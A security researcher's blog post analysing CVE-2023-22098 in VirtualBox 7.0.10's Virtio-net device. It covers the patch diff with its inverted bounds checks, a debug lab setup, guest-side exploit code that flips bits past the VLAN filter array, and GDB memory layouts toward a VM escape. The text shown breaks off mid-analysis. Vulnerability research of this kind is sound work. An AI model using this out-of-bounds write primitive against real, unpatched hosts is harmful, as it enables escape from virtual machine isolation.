Oracle VM VirtualBox 7.0.10 r158379 Escape

Hey VM Wizards, DiegoAltF4 here! Time to unleash some real virtualization magic!

In 2023, the outstanding security researcher Andy Nguyen discovered multiple vulnerabilities in Virtio-net for VirtualBox. All kudos to him.

In this post, I’ll take you through an in-depth analysis of CVE-2023-22098. We’ll begin by exploring the vulnerability and diving into some Virtio-net internals. Next, I’ll guide you through setting up a debugging environment, and we’ll wrap things up by developing a fully reliable PoC that escapes VirtualBox (it includes an ASLR bypass).

If you run into any issues or have questions, feel free to reach out to me on X!

Virtio-net

As mentioned in ¹: “In a nutshell, virtio is an abstraction layer over devices in a paravirtualized hypervisor. virtio was developed by Rusty Russell in support of his own virtualization solution called lguest”.

Virtio was developed as a standardized, open interface to simplify the way virtual machines (VMs) access devices like block devices and network adapters. Virtio-net, a virtual ethernet card, is one of the most complex devices currently supported by virtio. As mentioned in ² “the communication between the driver in the guest OS and the device in the hypervisor is done through shared memory (that’s what makes virtio devices so efficient) using specialized data structures called virtqueues, which are actually ring buffers of buffer descriptors”.

The most common queues in Virtio-net are:

TX Queue (Transmit Queue): Used to send packets from the guest to the host.
RX Queue (Receive Queue): Used to deliver packets from the host to the guest.

Additionally, Virtio-net includes a Control Virtqueue (CtrlQ), which is used to send control commands from the guest to the host. These commands allow the guest to modify or query the configuration of the Virtio-net device, for example, querying status in real-time.

As mentioned in ³: “To each guest we can associate a number of virtual CPUs (vCPUs) and the RX/TX queues are created per CPU so a more elaborated example with 4 vCPUs would look like this (removing the control plane for simplicity)”:

For example, when the guest wants to send a network packet to the host:

The guest places the packet in a shared memory buffer.
The guest creates a descriptor in the Descriptor Ring, pointing to the buffer holding the packet.
The guest places the index of the descriptor in the Available Ring, indicating that the buffer is ready for processing.
The guest notifies the host by writing to a notification register that a packet is ready for transmission.
The host reads the buffer, transmits the packet, and places the descriptor index in the Used Ring to indicate that processing is complete. Optionally, the host generates an interrupt to notify the guest that the buffer can be reused.
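The five steps above can be sketched with a toy split virtqueue. This is a minimal model, not the real driver: the ring layouts follow the VirtIO split-ring format, but `toy_virtq`, `toy_guest_send`, `toy_host_process`, the fixed queue size and the `notified` flag are hypothetical names introduced only for illustration, and the memory barriers a real driver needs are left out.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define QSIZE 8  /* toy queue size (assumption); real queues negotiate it */

struct vring_desc      { uint64_t addr; uint32_t len; uint16_t flags; uint16_t next; };
struct vring_used_elem { uint32_t id; uint32_t len; };

struct toy_virtq {
    struct vring_desc desc[QSIZE];                                             /* Descriptor Ring */
    struct { uint16_t flags, idx; uint16_t ring[QSIZE]; } avail;               /* written by the guest */
    struct { uint16_t flags, idx; struct vring_used_elem ring[QSIZE]; } used;  /* written by the host */
    uint16_t last_avail;  /* host-side cursor into avail.ring */
    int notified;         /* stand-in for the notification register */
};

/* Guest side: describe the buffer, publish it, then notify the host. */
static void toy_guest_send(struct toy_virtq *q, uint16_t slot, const void *pkt, uint32_t len)
{
    assert(slot < QSIZE);
    q->desc[slot].addr  = (uint64_t)(uintptr_t)pkt;  /* descriptor points at the packet */
    q->desc[slot].len   = len;
    q->desc[slot].flags = 0;
    q->desc[slot].next  = 0;
    q->avail.ring[q->avail.idx % QSIZE] = slot;      /* descriptor index into the Available Ring */
    q->avail.idx++;                                  /* a real driver issues a barrier before this */
    q->notified = 1;                                 /* "write to the notification register" */
}

/* Host side: consume one available buffer and report it in the Used Ring.
 * Returns the number of bytes copied into out, or 0 if nothing is pending. */
static uint32_t toy_host_process(struct toy_virtq *q, void *out, uint32_t cap)
{
    if (q->last_avail == q->avail.idx)
        return 0;
    uint16_t slot = q->avail.ring[q->last_avail % QSIZE];
    q->last_avail++;
    const struct vring_desc *d = &q->desc[slot];
    uint32_t n = d->len < cap ? d->len : cap;
    memcpy(out, (const void *)(uintptr_t)d->addr, n);
    q->used.ring[q->used.idx % QSIZE].id  = slot;    /* buffer can now be reused by the guest */
    q->used.ring[q->used.idx % QSIZE].len = 0;       /* host wrote nothing back into a TX buffer */
    q->used.idx++;
    q->notified = 0;
    return n;
}
```

Calling `toy_guest_send(&q, 3, "ping", 5)` followed by `toy_host_process(&q, out, sizeof out)` walks one buffer through the descriptor, available and used rings in that order.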

For much more information, I recommend checking ² ³ ⁴.

Vulnerability Analysis

Let’s start by taking a look at the Oracle Critical Patch Update Advisory - October 2023:

As you can see, the affected versions are those prior to 7.0.12. Therefore, according to the VirtualBox Download Page, the latest vulnerable version is 7.0.10.

I like to start with a simple diff to get the big picture. In this case, the main file related to Virtio-net is src/VBox/Devices/Network/DevVirtioNet.cpp. Two functions contain the significant changes:

static uint8_t virtioNetR3CtrlMultiQueue(PVIRTIONET pThis, PVIRTIONETCC pThisCC, PPDMDEVINS pDevIns, PVIRTIONET_CTRL_HDR_T pCtrlPktHdr, PVIRTQBUF pVirtqBuf)
{
    LogFunc(("[%s] Processing CTRL MQ command\n", pThis->szInst));
    uint16_t cVirtqPairs;
    switch(pCtrlPktHdr->uCmd)
    {
        case VIRTIONET_CTRL_MQ_VQ_PAIRS_SET:
        {
-            size_t cbRemaining = pVirtqBuf->cbPhysSend - sizeof(*pCtrlPktHdr);
+            size_t cbRemaining = pVirtqBuf->cbPhysSend;
 
-            AssertMsgReturn(cbRemaining > sizeof(cVirtqPairs),
+            AssertMsgReturn(cbRemaining >= sizeof(cVirtqPairs),
                ("DESC chain too small for VIRTIONET_CTRL_MQ cmd processing"), VIRTIONET_ERROR);
 
            /* Fetch number of virtq pairs from guest buffer */
            virtioCoreR3VirtqBufDrain(&pThis->Virtio, pVirtqBuf, &cVirtqPairs, sizeof(cVirtqPairs));
 
-            AssertMsgReturn(cVirtqPairs > VIRTIONET_MAX_QPAIRS,
+            AssertMsgReturn(cVirtqPairs <= VIRTIONET_MAX_QPAIRS,
                ("[%s] Guest CTRL MQ virtq pair count out of range [%d])\n", pThis->szInst, cVirtqPairs), VIRTIONET_ERROR);
 
            LogFunc(("[%s] Guest specifies %d VQ pairs in use\n", pThis->szInst, cVirtqPairs));
            pThis->cVirtqPairs = cVirtqPairs;
            break;
        }
        default:
            LogRelFunc(("Unrecognized multiqueue subcommand in CTRL pkt from guest\n"));
            return VIRTIONET_ERROR;
    }
 
[Truncated]
 
static uint8_t virtioNetR3CtrlVlan(PVIRTIONET pThis, PVIRTIONET_CTRL_HDR_T pCtrlPktHdr, PVIRTQBUF pVirtqBuf)
{
    LogFunc(("[%s] Processing CTRL VLAN command\n", pThis->szInst));
 
    uint16_t uVlanId;
-    size_t cbRemaining = pVirtqBuf->cbPhysSend - sizeof(*pCtrlPktHdr);
+    size_t cbRemaining = pVirtqBuf->cbPhysSend;
 
-    AssertMsgReturn(cbRemaining > sizeof(uVlanId),
+    AssertMsgReturn(cbRemaining >= sizeof(uVlanId),
        ("DESC chain too small for VIRTIONET_CTRL_VLAN cmd processing"), VIRTIONET_ERROR);
 
    /* Fetch VLAN ID from guest buffer */
    virtioCoreR3VirtqBufDrain(&pThis->Virtio, pVirtqBuf, &uVlanId, sizeof(uVlanId));
 
-    AssertMsgReturn(uVlanId > VIRTIONET_MAX_VLAN_ID,
+    AssertMsgReturn(uVlanId < VIRTIONET_MAX_VLAN_ID,
        ("%s VLAN ID out of range (VLAN ID=%u)\n", pThis->szInst, uVlanId), VIRTIONET_ERROR);
 
    LogFunc(("[%s] uCommand=%u VLAN ID=%u\n", pThis->szInst, pCtrlPktHdr->uCmd, uVlanId));
 
    switch (pCtrlPktHdr->uCmd)
    {
        case VIRTIONET_CTRL_VLAN_ADD:
            ASMBitSet(pThis->aVlanFilter, uVlanId);
            break;
        case VIRTIONET_CTRL_VLAN_DEL:
            ASMBitClear(pThis->aVlanFilter, uVlanId);
            break;
        default:
            LogRelFunc(("Unrecognized VLAN subcommand in CTRL pkt from guest\n"));
            return VIRTIONET_ERROR;
    }
    return VIRTIONET_OK;
}

The changes in AssertMsgReturn quickly caught my attention. Here’s how it’s implemented:

include/iprt/assert.h

# define AssertMsgReturn(expr, a, rc) \
    do { \
        if (RT_LIKELY(!!(expr))) \
        { /* likely */ } \
        else \
            return (rc); \
    } while (0)

Let’s break it down. The macro evaluates the expression expr:

If expr evaluates to true, nothing happens (the if block is empty).
If expr evaluates to false, the else block executes, returning the value rc.

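Now, here’s the interesting bug: in the vulnerable version, both range checks are inverted. AssertMsgReturn bails out when its expression is false, so the handlers reject every in-range value and only continue when cVirtqPairs > VIRTIONET_MAX_QPAIRS or uVlanId > VIRTIONET_MAX_VLAN_ID.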
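To see the inversion in isolation, here is a small sketch. `TOY_ASSERT_RETURN` mirrors only the control flow of the macro quoted above, and all `toy_` and `TOY_` names are hypothetical. The limit of 4096 is inferred from the 4096-byte aVlanFilter array that GDB reports later in this post.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_MAX_VLAN_ID 4096  /* inferred from the aVlanFilter size; an assumption */
#define TOY_OK    0
#define TOY_ERROR 1

/* Same control flow as the AssertMsgReturn variant quoted above. */
#define TOY_ASSERT_RETURN(expr, rc) \
    do { if (!(expr)) return (rc); } while (0)

/* Vulnerable shape: the handler continues only when the ID is out of range. */
static int toy_check_vulnerable(uint16_t uVlanId)
{
    TOY_ASSERT_RETURN(uVlanId > TOY_MAX_VLAN_ID, TOY_ERROR);
    return TOY_OK;
}

/* Patched shape: the handler continues only when the ID is in range. */
static int toy_check_patched(uint16_t uVlanId)
{
    TOY_ASSERT_RETURN(uVlanId < TOY_MAX_VLAN_ID, TOY_ERROR);
    return TOY_OK;
}

/* Small self-check that spells out the behaviour of both variants. */
static void toy_self_check(void)
{
    assert(toy_check_vulnerable(100)   == TOY_ERROR); /* legitimate ID is rejected */
    assert(toy_check_vulnerable(40000) == TOY_OK);    /* out-of-range ID is accepted */
    assert(toy_check_patched(100)      == TOY_OK);
    assert(toy_check_patched(40000)    == TOY_ERROR);
}
```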

After considering the possibility of abusing cVirtqPairs > VIRTIONET_MAX_QPAIRS, I turned my focus to the second case (uVlanId > VIRTIONET_MAX_VLAN_ID), where uVlanId is passed straight to ASMBitSet and ASMBitClear as a bit index. These functions do the following:

src/VBox/Runtime/common/asm/asm-fake.cpp

RTDECL(void) ASMBitSet(volatile void *pvBitmap, int32_t iBit)
{
    uint8_t volatile *pau8Bitmap = (uint8_t volatile *)pvBitmap;
    pau8Bitmap[iBit / 8] |= (uint8_t)RT_BIT_32(iBit & 7);
}

src/VBox/Runtime/common/asm/asm-fake.cpp

RTDECL(void) ASMBitClear(volatile void *pvBitmap, int32_t iBit)
{
    uint8_t volatile *pau8Bitmap = (uint8_t volatile *)pvBitmap;
    pau8Bitmap[iBit / 8] &= ~((uint8_t)RT_BIT_32(iBit & 7));
}

These functions rely on bitwise operations to manipulate the bits in the pThis->aVlanFilter array. Specifically:

ASMBitSet sets the bit in the bitmap.
ASMBitClear clears the bit.

This seemed more promising for exploitation, as it gives us an out-of-bounds write past the end of aVlanFilter in the VIRTIONET structure:

src/VBox/Devices/Network/DevVirtioNet.cpp

typedef struct VIRTIONET
{
    /** The core virtio state.   */
    VIRTIOCORE              Virtio;
 
    /** Virtio device-specific configuration */
    VIRTIONET_CONFIG_T      virtioNetConfig;
 
    /** Per device-bound virtq worker-thread contexts (eventq slot unused) */
    VIRTIONETWORKER         aWorkers[VIRTIONET_MAX_VIRTQS];
 
    /** Track which VirtIO queues we've attached to */
    VIRTIONETVIRTQ          aVirtqs[VIRTIONET_MAX_VIRTQS];
 
    /** PDM device Instance name */
    char                    szInst[16];
 
    [Truncated]
 
    /** MAC address obtained from the configuration. */
    RTMAC                   macConfigured;
 
    /** Bit array of VLAN filter, one bit per VLAN ID. */
    uint8_t                 aVlanFilter[VIRTIONET_MAX_VLAN_ID / sizeof(uint8_t)]; // out-of-bounds write
 
    /** Set if PDM leaf device at the network interface is starved for Rx buffers */
    bool volatile           fLeafWantsEmptyRxBufs;
 
    /** Number of packet being sent/received to show in debug log. */
    uint32_t                uPktNo;
 
    /** Flags whether VirtIO core is in ready state */
    uint8_t                 fVirtioReady;
 
    /** Resetting flag */
    uint8_t                 fResetting;
 
    [Truncated]
 
} VIRTIONET;
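To make the primitive concrete, here is a sketch that models the bitmap followed by a neighbouring region and replays the vulnerable handler against it. The struct and function names are hypothetical, and the 4096-byte bitmap size is an assumption inferred from the declaration above. Because uVlanId is a uint16_t, the byte index uVlanId / 8 can reach 8191, which is past a 4096-byte array.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_MAX_VLAN_ID 4096  /* assumption, see lead-in */

struct toy_dev {
    uint8_t aVlanFilter[TOY_MAX_VLAN_ID]; /* the bitmap the handler means to touch */
    uint8_t neighbour[4096];              /* stand-in for everything that follows it */
};

/* Same arithmetic as ASMBitSet / ASMBitClear in asm-fake.cpp. */
static void toy_bit_set(volatile uint8_t *bitmap, int32_t iBit)
{
    bitmap[iBit / 8] |= (uint8_t)(1u << (iBit & 7));
}

static void toy_bit_clear(volatile uint8_t *bitmap, int32_t iBit)
{
    bitmap[iBit / 8] &= (uint8_t)~(1u << (iBit & 7));
}

/* Vulnerable-style handler: only IDs above the limit get through.
 * Returns 0 when the bit was written and -1 when the ID was rejected. */
static int toy_vlan_cmd(struct toy_dev *dev, int add, uint16_t uVlanId)
{
    if (!(uVlanId > TOY_MAX_VLAN_ID))
        return -1;
    /* Index from the start of the whole object so the toy stays well defined. */
    uint8_t *base = (uint8_t *)dev + offsetof(struct toy_dev, aVlanFilter);
    assert((size_t)(uVlanId / 8) < sizeof *dev);
    if (add)
        toy_bit_set(base, uVlanId);
    else
        toy_bit_clear(base, uVlanId);
    return 0;
}
```

With this layout, ID 4096 * 8 + 3 lands on bit 3 of neighbour[0], so one ADD command sets that byte to 0x08 and one DEL command clears it again.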

Setting up the lab

We’ll focus on developing the exploit for the debug version of VirtualBox, as it provides access to all symbols, making it easier to analyze and understand the exploitation process.

The source code for the latest vulnerable version can be obtained here. Both my host operating system and my guest operating system are Ubuntu 20.04.6 LTS.

This guide outlines the steps for building VirtualBox with debug symbols.

Once the required packages have been installed, the following commands need to be executed:

ln -s libX11.so.6    /usr/lib32/libX11.so
ln -s libXTrap.so.6  /usr/lib32/libXTrap.so
ln -s libXt.so.6     /usr/lib32/libXt.so
ln -s libXtst.so.6   /usr/lib32/libXtst.so
ln -s libXmu.so.6    /usr/lib32/libXmu.so
ln -s libXext.so.6   /usr/lib32/libXext.so

And finally:

chmod +x configure
chmod +x kBuild/bin/linux.amd64/k*
./configure --disable-hardening
source ./env.sh
kmk BUILD_TYPE=debug

ASAN can be enabled with:

kmk BUILD_TYPE=debug VBOX_WITH_GCC_SANITIZER=1

The virtual machine can be launched with the command:

./VirtualBoxVM --startvm <vm-name>

To configure the VM, we need to modify the network adapter type and select virtio-net:

Once configured, we can verify that everything is working correctly by running the following command:

lspci -v

If successful, the device should appear as shown below:

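As mentioned in ¹:

“When using PCI as a transport method, the device will present itself on the PCI bus with vendor 0x1af4 (Red Hat, Inc.) and device id 0x1003 (virtio console), as defined in the spec, so the kernel will detect it as it would do with any other PCI device.”

The quoted example is a virtio console. Per the VirtIO specification, a network device uses the same vendor ID with device ID 0x1000 (transitional) or 0x1041 (modern).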

Writing the exploit

Now that we know where the bug is located and have a functional debugging environment, we can start attempting to exploit the bug, with the goal of escaping from the virtual machine.

Triggering the bug

To trigger the bug, we need to reach the virtioNetR3CtrlVlan function and specify a value of uVlanId > VIRTIONET_MAX_VLAN_ID. The function responsible for calling virtioNetR3CtrlVlan is virtioNetR3Ctrl, which handles processing control commands from the guest. It is invoked by the worker thread for the virtio-net control queue to process a queued control command buffer:

src/VBox/Devices/Network/DevVirtioNet.cpp

static void virtioNetR3Ctrl(PPDMDEVINS pDevIns, PVIRTIONET pThis, PVIRTIONETCC pThisCC,
                            PVIRTQBUF pVirtqBuf)
{
 
    [Truncated]
 
    /*
     * Allocate buffer and read in the control command
     */
    AssertMsgReturnVoid(pVirtqBuf->cbPhysSend >= sizeof(VIRTIONET_CTRL_HDR_T),
                        ("DESC chain too small for CTRL pkt header"));
 
    VIRTIONET_CTRL_HDR_T CtrlPktHdr; RT_ZERO(CtrlPktHdr);
    virtioCoreR3VirtqBufDrain(&pThis->Virtio, pVirtqBuf, &CtrlPktHdr,
                                RT_MIN(pVirtqBuf->cbPhysSend, sizeof(CtrlPktHdr)));
 
    Log7Func(("[%s] CTRL COMMAND: class=%d command=%d\n", pThis->szInst, CtrlPktHdr.uClass, CtrlPktHdr.uCmd));
 
    uint8_t uAck;
    switch (CtrlPktHdr.uClass)
    {
        case VIRTIONET_CTRL_RX:
            uAck = virtioNetR3CtrlRx(pThis, pThisCC, &CtrlPktHdr, pVirtqBuf);
            break;
        case VIRTIONET_CTRL_MAC:
            uAck = virtioNetR3CtrlMac(pThis, &CtrlPktHdr, pVirtqBuf);
            break;
        case VIRTIONET_CTRL_VLAN:
            uAck = virtioNetR3CtrlVlan(pThis, &CtrlPktHdr, pVirtqBuf);
            break;
        case VIRTIONET_CTRL_MQ:
            uAck = virtioNetR3CtrlMultiQueue(pThis, pThisCC, pDevIns, &CtrlPktHdr, pVirtqBuf);
            break;
        case VIRTIONET_CTRL_ANNOUNCE:
            uAck = VIRTIONET_OK;
            if (FEATURE_DISABLED(STATUS) || FEATURE_DISABLED(GUEST_ANNOUNCE))
            {
                LogFunc(("%s Ignoring CTRL class VIRTIONET_CTRL_ANNOUNCE.\n"
                         "VIRTIO_F_STATUS or VIRTIO_F_GUEST_ANNOUNCE feature not enabled\n", pThis->szInst));
                break;
            }
            if (CtrlPktHdr.uCmd != VIRTIONET_CTRL_ANNOUNCE_ACK)
            {
                LogFunc(("[%s] Ignoring CTRL class VIRTIONET_CTRL_ANNOUNCE. Unrecognized uCmd\n", pThis->szInst));
                break;
            }
#if FEATURE_OFFERED(STATUS)
            pThis->virtioNetConfig.uStatus &= ~VIRTIONET_F_ANNOUNCE;
#endif
            Log7Func(("[%s] Clearing VIRTIONET_F_ANNOUNCE in config status\n", pThis->szInst));
            break;
        default:
            LogRelFunc(("Unrecognized CTRL pkt hdr class (%d)\n", CtrlPktHdr.uClass));
            uAck = VIRTIONET_ERROR;
    }
 
    [Truncated]
}

The value of uClass from the CtrlPktHdr structure is evaluated in a switch statement. This uClass represents the type of control command being processed. Depending on its value, different functions are called to handle the specific control command.

Therefore, in our exploit, we can do the following:

exploit.c

 
[Truncated]
 
if (value & (1ULL << i))
    cmd = VIRTIONET_CTRL_VLAN_ADD;
else
    cmd = VIRTIONET_CTRL_VLAN_DEL;
 
// Setting the control header
dev->ctrl->hdr.class = VIRTIONET_CTRL_VLAN;
dev->ctrl->hdr.cmd   = cmd;
dev->ctrl->vlanId    = cpu_to_virtio16(vdev, offset * 8 + i);
 
// Initialize scatterlist
sg_init_one(&sgs[0], dev->ctrl, sizeof(struct command_entry) + 4);
psgs[0] = &sgs[0];
 
// Add the buffer to the control queue
virtqueue_add_sgs(dev->vqueues[2], psgs, 1, 0, dev, GFP_KERNEL);
 
// Kick queue to process the command
virtqueue_kick(dev->vqueues[2]);
 
// Wait for the command to be processed
while (!virtqueue_get_buf(dev->vqueues[2], &len) && !virtqueue_is_broken(dev->vqueues[2]))
{
    cpu_relax();
}
 
[Truncated]

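Note: I added the +4 to satisfy the check cbRemaining > sizeof(uVlanId) in virtioNetR3CtrlVlan. In the vulnerable version, cbRemaining is computed as cbPhysSend - sizeof(*pCtrlPktHdr) and compared with a strict >, so a buffer holding exactly the control header plus the 2-byte uVlanId is rejected. VBox doesn’t seem to handle the size correctly here, which is consistent with the patch changing both the computation and the comparison.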
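Since each control command flips a single bit, writing a full 64-bit value means issuing 64 commands. The sketch below plans that sequence and replays it against a plain buffer to check the result. It is an illustration under assumptions: `toy_vlan_op`, `toy_plan_write64` and `toy_apply` are hypothetical helpers, the ADD/DEL values 0 and 1 follow the VirtIO specification, and byte_off is measured from the start of aVlanFilter, as offset is in the snippet above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_VLAN_ADD    0     /* VIRTIO_NET_CTRL_VLAN_ADD in the VirtIO spec */
#define TOY_VLAN_DEL    1     /* VIRTIO_NET_CTRL_VLAN_DEL in the VirtIO spec */
#define TOY_MAX_VLAN_ID 4096  /* assumption, inferred from the aVlanFilter size */

struct toy_vlan_op { uint8_t cmd; uint16_t vlan_id; };

/* Plan the 64 commands that write `value` at `byte_off` (relative to the bitmap).
 * Bit i of the value maps to VLAN ID byte_off * 8 + i: ADD sets it, DEL clears it. */
static size_t toy_plan_write64(uint32_t byte_off, uint64_t value, struct toy_vlan_op ops[64])
{
    for (unsigned i = 0; i < 64; i++) {
        uint32_t bit = byte_off * 8u + i;
        /* The inverted check only lets IDs above the limit through, and the
         * ID has to fit in the 16-bit vlanId field of the command. */
        assert(bit > TOY_MAX_VLAN_ID && bit <= UINT16_MAX);
        ops[i].cmd     = ((value >> i) & 1) ? TOY_VLAN_ADD : TOY_VLAN_DEL;
        ops[i].vlan_id = (uint16_t)bit;
    }
    return 64;
}

/* Replay a plan against a local buffer, the way the host would apply it. */
static void toy_apply(uint8_t *bitmap, const struct toy_vlan_op *ops, size_t n)
{
    for (size_t k = 0; k < n; k++) {
        uint8_t mask = (uint8_t)(1u << (ops[k].vlan_id & 7));
        if (ops[k].cmd == TOY_VLAN_ADD)
            bitmap[ops[k].vlan_id / 8] |= mask;
        else
            bitmap[ops[k].vlan_id / 8] &= (uint8_t)~mask;
    }
}
```

Issuing both ADD and DEL commands, instead of only setting bits, is what makes the write independent of the target's previous contents.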

If we set a breakpoint at src/VBox/Devices/Network/DevVirtioNet.cpp:2536, we can verify that the uClass has been correctly set. Additionally, we can set another breakpoint at src/VBox/Devices/Network/DevVirtioNet.cpp:2467 to check that the value of uVlanId is as expected:

Identifying structures in memory

Alright, knowing that we have an out-of-bounds write, what can we modify? To figure this out, we are going to try to identify the structures in memory, which will give us a much clearer understanding of our situation.

As we’ve already seen, the function virtioNetR3CtrlVlan attempts to modify pThis->aVlanFilter, where pThis is of the type PVIRTIONET:

GDB

gef>  ptype /o pThis
type = struct VIRTIONET {
/*    0      |  2144 */    VIRTIOCORE Virtio;
/* 2144      |    10 */    VIRTIONET_CONFIG_T virtioNetConfig;
/* XXX  6-byte hole  */
/* 2160      |    48 */    VIRTIONETWORKER aWorkers[3];
/* 2208      |   120 */    VIRTIONETVIRTQ aVirtqs[3];
/* 2328      |    16 */    char szInst[16];
/* 2344      |     8 */    uint64_t fNegotiatedFeatures;
/* 2352      |     2 */    uint16_t cVirtqPairs;
/* 2354      |     2 */    uint16_t cInitializedVirtqPairs;
/* 2356      |     2 */    uint16_t cVirtqs;
/* 2358      |     2 */    uint16_t cWorkers;
/* 2360      |     2 */    uint16_t alignment;
/* XXX  2-byte hole  */
/* 2364      |     4 */    uint32_t uIsTransmitting;
/* 2368      |     4 */    uint32_t cMsLinkUpDelay;
/* 2372      |     4 */    uint32_t cMulticastFilterMacs;
/* 2376      |     4 */    uint32_t cUnicastFilterMacs;
/* XXX  4-byte hole  */
/* 2384      |     8 */    SUPSEMEVENT hEventRxDescAvail;
/* 2392      |   384 */    RTMAC aMacMulticastFilter[64];
/* 2776      |   384 */    RTMAC aMacUnicastFilter[64];
/* 3160      |     6 */    RTMAC rxFilterMacDefault;
/* 3166      |     6 */    RTMAC macConfigured;
/* 3172      |  4096 */    uint8_t aVlanFilter[4096];
/* 7268      |     1 */    volatile bool fLeafWantsEmptyRxBufs;
/* XXX  3-byte hole  */
/* 7272      |     4 */    uint32_t uPktNo;
/* 7276      |     1 */    uint8_t fVirtioReady;
/* 7277      |     1 */    uint8_t fResetting;
/* 7278      |     1 */    uint8_t fPromiscuous;
/* 7279      |     1 */    uint8_t fAllMulticast;
/* 7280      |     1 */    uint8_t fAllUnicast;
/* 7281      |     1 */    uint8_t fNoMulticast;
/* 7282      |     1 */    uint8_t fNoUnicast;
/* 7283      |     1 */    uint8_t fNoBroadcast;
/* 7284      |     4 */    VIRTIONETPKTHDRTYPE ePktHdrType;
/* 7288      |     2 */    uint16_t cbPktHdr;
/* 7290      |     1 */    bool fCableConnected;
/* 7291      |     1 */    bool fOfferLegacy;
/* XXX  4-byte hole  */
/* 7296      |     8 */    STAMCOUNTER StatReceiveBytes;
/* 7304      |     8 */    STAMCOUNTER StatTransmitBytes;
/* 7312      |     8 */    STAMCOUNTER StatReceiveGSO;
/* 7320      |     8 */    STAMCOUNTER StatTransmitPackets;
/* 7328      |     8 */    STAMCOUNTER StatTransmitGSO;
/* 7336      |     8 */    STAMCOUNTER StatTransmitCSum;
/* 7344      |    32 */    STAMPROFILE StatReceive;
/* 7376      |    32 */    STAMPROFILE StatReceiveStore;
/* 7408      |    40 */    STAMPROFILEADV StatTransmit;
/* 7448      |    32 */    STAMPROFILE StatTransmitSend;
/* 7480      |    32 */    STAMPROFILE StatRxOverflow;
/* 7512      |     8 */    STAMCOUNTER StatRxOverflowWakeup;
/* 7520      |     8 */    STAMCOUNTER StatTransmitByNetwork;
/* 7528      |     8 */    STAMCOUNTER StatTransmitByThread;
 
                             /* total size (bytes): 7536 */
                         } *

Right after this structure, following 16 bytes of padding, we find the PDMCRITSECT structure (the device's critical section).

GDB

gef>  x/20gx ((void*)pThis + 7536)
0x7fffb26b51b0:	0x0000000000000000	0x0000000000000000 ==> padding
0x7fffb26b51c0:	0xffffffff19790326	0xffffffffffffffff
0x7fffb26b51d0:	0x0000000000000001	0x0000000000000033
0x7fffb26b51e0:	0x00007fff9c351d60	0x0000000000000000
0x7fffb26b51f0:	0x00007fff9158d5e8	0x00007fffb26b3000
0x7fffb26b5200:	0x0000000000000101	0x0000000000000000
0x7fffb26b5210:	0x00007fff9c34e720	0x00007fffb26b51c0
0x7fffb26b5220:	0x0000000000000000	0x0000000000000000
0x7fffb26b5230:	0x0000000000000000	0x0000000000000000
0x7fffb26b5240:	0x0000000000000000	0xffffffffffffffff

GDB

gef>  ptype /o *(PPDMCRITSECT)0x7fffb26b51b0
/* offset    |  size */  type = union PDMCRITSECT {
/*               256 */    uint8_t padding[256];
 
                             /* total size (bytes):  256 */
                         }

Later, we come across the PDMPCIDEV structure:

GDB

gef>  x/20gx ((void*)pThis + 7536 + 16 + 256)
0x7fffb26b52c0:	0x0000001819391118	0x0000000090000100
0x7fffb26b52d0:	0x00007fffb07dc408	0x0000000000000000
0x7fffb26b52e0:	0x0000000000000000	0x0000000000000000
0x7fffb26b52f0:	0x0000000000000000	0x0000000000000000
0x7fffb26b5300:	0x00007fffb26b3000	0x0000010000000100
0x7fffb26b5310:	0x00007fffdc0002c0	0x00007fffb03a0df7
0x7fffb26b5320:	0x00007fffb03a10c8	0x0000000000000000
0x7fffb26b5330:	0x0000000000000000	0x0000000000000000
0x7fffb26b5340:	0x0000000000000000	0x0000000000000000
0x7fffb26b5350:	0xffffffffffffffff	0x0000000000000000

GDB

gef>   ptype /o *(PDMPCIDEV*)0x7fffb26b52c0
/* offset    |  size */  type = struct PDMPCIDEV {
/*    0      |     4 */    uint32_t u32Magic;
/*    4      |     4 */    uint32_t uDevFn;
/*    8      |     2 */    uint16_t cbConfig;
/*   10      |     2 */    uint16_t cbMsixState;
/*   12      |     2 */    uint16_t idxSubDev;
/*   14      |     2 */    uint16_t u16Padding;
/*   16      |     8 */    const char *pszNameR3;
/*   24      |     8 */    int (*pfnRegionLoadChangeHookR3)(PPDMDEVINS, PPDMPCIDEV, uint32_t, uint64_t, PCIADDRESSSPACE, PFNPCIIOREGIONOLDSETTER, PFNPCIIOREGIONSWAP);
/*   32      |    32 */    uint64_t au64Reserved[4];
/*   64      |   384 */    union {
/*               384 */        uint8_t padding[384];
/* XXX 320-byte padding  */
 
                                 /* total size (bytes):  384 */
                             } Int;
/*  448      |  4096 */    uint8_t abConfig[4096];
/* 4544      |     0 */    uint8_t abMsixState[];
 
                             /* total size (bytes): 4544 */
                         }

If we examine the definition of this structure, we find the most important and key member PDMPCIDEVINT s, which represents the internal data of the PDM PCI device:

include/VBox/vmm/pdmpcidev.h

typedef struct PDMPCIDEV
{
    /** @name Read only data.
     * @{
     */
    /** Magic number (PDMPCIDEV_MAGIC). */
    uint32_t                u32Magic;
    /** PCI device number [11:3] and function [2:0] on the pci bus.
     * @sa VBOX_PCI_DEVFN_MAKE, VBOX_PCI_DEVFN_FUN_MASK, VBOX_PCI_DEVFN_DEV_SHIFT */
    uint32_t                uDevFn;
 
    [Truncated]
 
    /** Internal data. */
    union
    {
#ifdef PDMPCIDEVINT_DECLARED
        PDMPCIDEVINT        s;
#endif
        uint8_t             padding[0x180];
    } Int;
 
    /** PCI config space.
     * This is either 256 or 4096 in size.  In the latter case it may be
     * followed by a MSI-X state area. */
    uint8_t                 abConfig[4096];
    /** The MSI-X state data.  Optional. */
    RT_FLEXIBLE_ARRAY_EXTENSION
    uint8_t                 abMsixState[RT_FLEXIBLE_ARRAY];
} PDMPCIDEV;

Let’s verify it:

GDB

gef>  x/20gx ((void*)pThis + 7536 + 16 + 256 + 64)
0x7fffb26b5300:	0x00007fffb26b3000	0x0000010000000100
0x7fffb26b5310:	0x00007fffdc0002c0	0x00007fffb03a0df7
0x7fffb26b5320:	0x00007fffb03a10c8	0x0000000000000000
0x7fffb26b5330:	0x0000000000000000	0x0000000000000000
0x7fffb26b5340:	0x0000000000000000	0x0000000000000000
0x7fffb26b5350:	0xffffffffffffffff	0x0000000000000000
0x7fffb26b5360:	0x000000000000d020	0x0000000000000020
0x7fffb26b5370:	0x000000000000003a	0x0000000100000005
0x7fffb26b5380:	0x0000000000000000	0x0000000000000000
0x7fffb26b5390:	0x0000000000000000	0x0000000000000000

GDB

gef>   p *(PDMPCIDEVINT*)((void*)pThis + 7536 + 16 + 256 + 64)
{
